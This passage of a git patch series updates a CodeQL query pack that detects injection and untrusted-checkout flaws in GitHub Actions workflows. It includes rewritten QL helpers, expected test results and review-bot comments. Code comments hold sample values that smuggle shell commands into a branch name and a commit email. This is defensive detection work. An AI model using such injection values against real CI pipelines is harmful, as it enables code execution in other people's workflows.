ref: ${{ github.event.pull_request.head.sha }} + - uses: jfrog/frogbot@8fbeca612957ae5f5f0c03a19cb6e59e237026f3 # v2.10.0 + env: + JF_URL: ${{ secrets.JF_URL }} + JF_ACCESS_TOKEN: ${{ secrets.JF_ACCESS_TOKEN }} + JF_GIT_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1f90c56607df..2660a726ab6f 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,5 +1,7 @@
 | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
+| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
 | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. |
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
index a40ab1fa771b..9015e85b3d03 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected
@@ -15,6 +15,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From c6e3bafe00b9068d3b3b0ff1318a99b3b6b44f08 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:35:06 +0200 Subject: [PATCH 309/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30aa95964e10..2736e30331c2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.29 +version: 0.0.30 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4c89d7804a90..451b49ec07e9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.29 +version: 0.0.30 groups: - actions - queries 
From 3e9c19044e58220399053ccb797f371c5de21c57 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 31 May 2024 16:01:27 +0200 Subject: [PATCH 310/707] Improve bash and source regexpps --- ql/lib/codeql/actions/Helper.qll | 284 +++++++++------ ql/lib/codeql/actions/ast/internal/Ast.qll | 21 +- .../codeql/actions/dataflow/FlowSources.qll | 344 ++++++++---------- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 52 +-- .../security/EnvPathInjectionQuery.qll | 8 +- .../actions/security/EnvVarInjectionQuery.qll | 14 +- .../actions/security/PoisonableSteps.qll | 13 +- .../.github/workflows/multiline.yml | 56 +++ ql/test/library-tests/test.expected | 319 +++++++++++++--- ql/test/library-tests/test.ql | 86 ++++- .../.github/workflows/reusable_workflow.yml | 2 +- .../CWE-077/.github/workflows/test4.yml | 15 +- .../CWE-077/EnvVarInjectionCritical.expected | 16 +- .../CWE-077/EnvVarInjectionMedium.expected | 11 +- .../CWE-094/.github/workflows/test5.yml | 13 + .../CWE-094/CodeInjectionCritical.expected | 2 + .../CWE-094/CodeInjectionMedium.expected | 1 + 17 files changed, 820 insertions(+), 437 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test5.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 416cb97c8d08..563a9800214e 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -10,12 +10,11 @@ string normalizeExpr(string expr) { } bindingset[regex] -string wrapRegexp(string regex) { - result = - [ - "\\b" + regex + "\\b", "fromJSON\\(\\s*" + regex + "\\s*\\)", - "toJSON\\(\\s*" + regex + "\\s*\\)" - ] +string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" } + +bindingset[regex] +string wrapJsonRegexp(string regex) { + result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"] } bindingset[str] 
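Review bot: Narrowing `wrapRegexp` to only the `\b…\b` form silently changes every existing caller that relied on the `fromJSON(...)`/`toJSON(...)` alternatives; those callers must now also use `wrapJsonRegexp`, and nothing in this hunk records that, so a caller updated elsewhere in this commit and one that was missed look identical at the call site. Both predicates should carry QLDoc stating the contract, e.g. `/** Wraps regex in word boundaries; combine with wrapJsonRegexp to also match fromJSON(regex)/toJSON(regex). */` and `/** Matches regex wrapped in a fromJSON(...) or toJSON(...) call. */`. Since `\b` is appended to `regex` as-is, a pattern that ends in a non-word character will only match when a word character follows it; if callers pass bracketed or quoted expressions, that limitation belongs in the doc too.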
@@ -23,135 +22,190 @@ private string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } -bindingset[line, var] -predicate extractLineAssignment(string line, string var, string key, string value) { - exists(string assignment | - // single line assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_" + - var.toUpperCase() + "(\\})?(\"|')?", 2) and - count(assignment.splitAt("=")) = 2 and - key = trimQuotes(assignment.splitAt("=", 0)) and - value = trimQuotes(assignment.splitAt("=", 1)) +/** Checks if expr is a bash parameter expansion */ +bindingset[expr] +predicate isBashParameterExpansion(string expr, string parameter, string operator, string params) { + exists(string regexp | + // $VAR + regexp = "\\$([a-zA-Z_][a-zA-Z0-9_]+)\\b" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" + or + // ${VAR} + regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = "" and + params = "" or - // workflow command assignment - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + - "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and - key = trimQuotes(assignment.splitAt("::", 0)) and - value = trimQuotes(assignment.splitAt("::", 1)) + // ${!VAR} + regexp = "\\$\\{([!#])([a-zA-Z_][a-zA-Z0-9_]*)\\}" and + parameter = expr.regexpCapture(regexp, 2) and + operator = expr.regexpCapture(regexp, 1) and + params = "" + or + // ${VAR}, ... 
+ regexp = "\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) ) } -bindingset[var] -private string multilineAssignmentRegex(string var) { - // eg: - // echo "PR_TITLE<> $GITHUB_ENV - // echo "$TITLE" >> $GITHUB_ENV - // echo "EOF" >> $GITHUB_ENV - result = - ".*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" -} - -bindingset[var] -private string multilineBlockAssignmentRegex(string var) { - // eg: - // { - // echo 'JSON_RESPONSE<> "$GITHUB_ENV" - // echo EOF - // } >> "$GITHUB_ENV" - result = - ".*\\{(\\s|::NEW_LINE::)*(echo|Write-Output)\\s+(.*)<<[\\-]*\\s*([A-Z]*)EOF(.+)(echo|Write-Output)\\s+(\"|')?([A-Z]*)EOF(\"|')?(\\s|::NEW_LINE::)*\\}\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" - + var.toUpperCase() + "(\\})?(\"|')?.*" +// TODO, the followinr test fails +bindingset[raw_content] +predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) } -bindingset[var] -private string multilineHereDocAssignmentRegex(string var) { - // eg: - // cat <<-EOF >> "$GITHUB_ENV" - // echo "FOO=$TITLE" - // EOF - result = - ".*cat\\s*<<[\\-]*\\s*[A-Z]*EOF\\s*>>\\s*[\"']*\\$[\\{]*GITHUB_.*" + var.toUpperCase() + - 
"[\\}]*[\"']*.*(echo|Write-Output)\\s+([^=]+)=(.*)::NEW_LINE::.*EOF.*" +bindingset[script] +predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) } -bindingset[script, var] -predicate extractMultilineAssignment(string script, string var, string key, string value) { - // multiline assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 4)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineAssignmentRegex(var), 2)) +bindingset[script] +predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) ) - or - // multiline block assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - "$(" + - trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 5)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", 
"\n") - .trim() - .splitAt("\n") + ")" and - key = trimQuotes(flattenedScript.regexpCapture(multilineBlockAssignmentRegex(var), 3)) +} + +bindingset[script] +predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 3)) and + content = script.regexpCapture(regexp, 5) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 6)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 7) ) - or - // multiline heredoc assignment - exists(string flattenedScript | - flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and - value = - trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 3)) - .regexpReplaceAll("\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + var.toUpperCase() + - "(\\})?(\"|')?", "") - .replaceAll("::NEW_LINE::", "\n") - .trim() - .splitAt("\n") and - key = trimQuotes(flattenedScript.regexpCapture(multilineHereDocAssignmentRegex(var), 2)) +} + +bindingset[script] +predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + content = + trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 5)) + + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content + //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", 
"") + ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + filters = "" ) } -bindingset[line] -predicate extractPathAssignment(string line, string value) { - exists(string path | - // single path assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", - 2) and - value = trimQuotes(path) - or - // workflow command assignment - path = - line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") and - value = trimQuotes(path) +bindingset[script] +predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + content = + script + .regexpCapture(regexp, 1) + .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") + .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + cmd = "echo" and + filters = "" + ) +} + +bindingset[script] +predicate multiLineFileWrite(string script, string cmd, string file, string content, string filters) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) +} + +bindingset[script, file_var] +predicate extractFileWrite(string script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isBashParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.splitAt("\n"), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + 
value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.splitAt("\n"), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script, _, file_expr, raw_content, _) and + isBashParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) ) } -predicate writeToGitHubEnv(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or - extractMultilineAssignment(run.getScript(), "ENV", key, value) +predicate writeToGitHubEnv(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_ENV", content) } -predicate writeToGitHubOutput(Run run, string key, string value) { - extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or - extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) +predicate writeToGitHubOutput(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_OUTPUT", content) } -predicate writeToGitHubPath(Run run, string value) { - extractPathAssignment(run.getScript().splitAt("\n"), value) +predicate writeToGitHubPath(Run run, string content) { + extractFileWrite(run.getScript(), "GITHUB_PATH", content) } predicate inPrivilegedCompositeAction(AstNode node) { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 61f0fa8e36e9..1094a152126b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
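Review bot: The optional quote groups in `singleLineWorkflowCmd` and `linesFileWrite` are written as `(['|\"])?` / `['|\"]?`, which is a character class containing a literal `|`, not an alternation, so a stray pipe is accepted in place of a quote; `(['\"])?` is what is meant. In `isBashParameterExpansion` the bare `$VAR` alternative uses `[a-zA-Z_][a-zA-Z0-9_]+`, which requires at least two characters, while the `${VAR}` alternative uses `*`, so a single-letter variable such as `$X` is never recognised and writes like `echo "K=$X" >> $GITHUB_ENV` silently drop out of `extractFileWrite`; use `*` in both. The `// TODO, the followinr test fails` line above `extractVariableAndValue` should name the failing test (and lose the typo) or be removed before merge. Only `echo`/`Write-Output` and `cat` heredocs are modelled here, so `printf 'K=%s\n' "$V" >> "$GITHUB_ENV"` and `... | tee -a "$GITHUB_ENV"`, both common in real workflows, are silent false negatives; a comment on `extractFileWrite` stating that limitation would help whoever tunes the heuristics next.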
@@ -749,12 +749,19 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + or // the job is triggered by a workflow_call event that can be triggered externally this.getATriggerEvent().getName() = "workflow_call" and - (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) - or - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) + ( + exists(ExpressionImpl e, string external_trigger | + e.getEnclosingJob() = this and + e.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable() + ) } /** Holds if the job is privileged. */ @@ -781,9 +788,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and - not expr.getFieldName() = "GITHUB_TOKEN" + not expr.getFieldName() = "GITHUB_TOKEN" ) } 
@@ -814,7 +821,7 @@ class JobImpl extends AstNodeImpl, TJobNode { // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and not this.getATriggerEvent().getName() = "pull_request" and - not this.getATriggerEvent().getName() = "workflow_call" + not this.getATriggerEvent().getName() = "workflow_call" or // the Workflow is a Reusable Workflow only and there is // a privileged caller workflow or we cant find a caller diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ca3e21e9d255..5f2d36e7cd80 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -19,186 +19,140 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -bindingset[context] -private predicate titleEvent(string context) { - exists(string reg | - reg = - [ - // title - "github\\.event\\.issue\\.title", // issue - "github\\.event\\.pull_request\\.title", // pull request - "github\\.event\\.discussion\\.title", // discussion - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title", - "github\\.event\\.workflow_run\\.display_title", // The event-specific title associated with the run or the run-name if set, or the value of run-name if it is set in the workflow. - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string titleEvent() { + result = + [ + "github\\.event\\.issue\\.title", // issue + "github\\.event\\.pull_request\\.title", // pull request + "github\\.event\\.discussion\\.title", // discussion + "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", + "github\\.event\\.pages\\[[0-9]+\\]\\.title", "github\\.event\\.workflow_run\\.display_title", + ] } -bindingset[context] -private predicate urlEvent(string context) { - exists(string reg | - reg = - [ - // url - "github\\.event\\.pull_request\\.head\\.repo\\.homepage", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string urlEvent() { result = "github\\.event\\.pull_request\\.head\\.repo\\.homepage" } + +private string textEvent() { + result = + [ + "github\\.event\\.issue\\.body", // body + "github\\.event\\.pull_request\\.body", // body + "github\\.event\\.discussion\\.body", // body + "github\\.event\\.review\\.body", // body + "github\\.event\\.comment\\.body", // body + "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage + "github\\.event\\.head_commit\\.message", // message + "github\\.event\\.workflow_run\\.head_commit\\.message", // message + "github\\.event\\.pull_request\\.head\\.repo\\.description", // description + 
"github\\.event\\.workflow_run\\.head_repository\\.description", // description + "github\\.event\\.client_payload\\[[0-9]+\\]", // payload + "github\\.event\\.client_payload", // payload + ] } -bindingset[context] -private predicate textEvent(string context) { - exists(string reg | - reg = - [ - // text - "github\\.event\\.issue\\.body", // body - "github\\.event\\.pull_request\\.body", // body - "github\\.event\\.discussion\\.body", // body - "github\\.event\\.review\\.body", // body - "github\\.event\\.comment\\.body", // body - "github\\.event\\.commits\\[[0-9]+\\]\\.message", // messsage - "github\\.event\\.head_commit\\.message", // message - "github\\.event\\.workflow_run\\.head_commit\\.message", // message - "github\\.event\\.pull_request\\.head\\.repo\\.description", // description - "github\\.event\\.workflow_run\\.head_repository\\.description", // description - "github\\.event\\.client_payload\\[[0-9]+\\]", // payload - "github\\.event\\.client_payload", // payload - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string branchEvent() { + // branch + // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . 
+ // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + result = + [ + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.merge_group\\.head_ref", + ] } -bindingset[context] -private predicate branchEvent(string context) { - exists(string reg | - reg = - [ - // branch - // https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names - // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. - // - They must contain at least one / - // - They cannot have two consecutive dots .. anywhere. - // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. - // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. - // - They cannot begin or end with a slash / or contain multiple consecutive slashes - // - They cannot end with a dot . 
- // - They cannot contain a sequence @{ - // - They cannot be the single character @ - // - They cannot contain a \ - // eg: zzz";echo${IFS}"hello";# would be a valid branch name - "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", - "github\\.event\\.pull_request\\.head\\.ref", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.merge_group\\.head_ref", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string labelEvent() { + // - They cannot contain a escaping \ + result = ["github\\.event\\.pull_request\\.head\\.label",] } -bindingset[context] -private predicate labelEvent(string context) { - exists(string reg | - reg = - [ - // label - // - They cannot contain a escaping \ - "github\\.event\\.pull_request\\.head\\.label", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string emailEvent() { + // `echo${IFS}hello`@domain.com + result = + [ + "github\\.event\\.head_commit\\.author\\.email", + "github\\.event\\.head_commit\\.committer\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", + "github\\.event\\.merge_group\\.committer\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", + ] } -bindingset[context] -private predicate emailEvent(string context) { - exists(string reg | - reg = - [ - // email - // `echo${IFS}hello`@domain.com - "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.merge_group\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - ] 
- | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string usernameEvent() { + // All characters must be either a hyphen (-) or alphanumeric + result = + [ + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.merge_group\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] } -bindingset[context] -private predicate usernameEvent(string context) { - exists(string reg | - reg = - [ - // username - // All characters must be either a hyphen (-) or alphanumeric - "github\\.event\\.head_commit\\.author\\.name", - "github\\.event\\.head_commit\\.committer\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", - "github\\.event\\.merge_group\\.committer\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string pathEvent() { + result = + [ + "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", + "github\\.event\\.workflow_run\\.referenced_workflows\\.path", + ] } -bindingset[context] -private predicate pathEvent(string context) { - exists(string reg | - reg = - [ - // filename - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.path", - "github\\.event\\.workflow_run\\.referenced_workflows\\.path", - ] - | - normalizeExpr(context).regexpMatch(wrapRegexp(reg)) - ) +private string jsonEvent() { + result = + [ + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + 
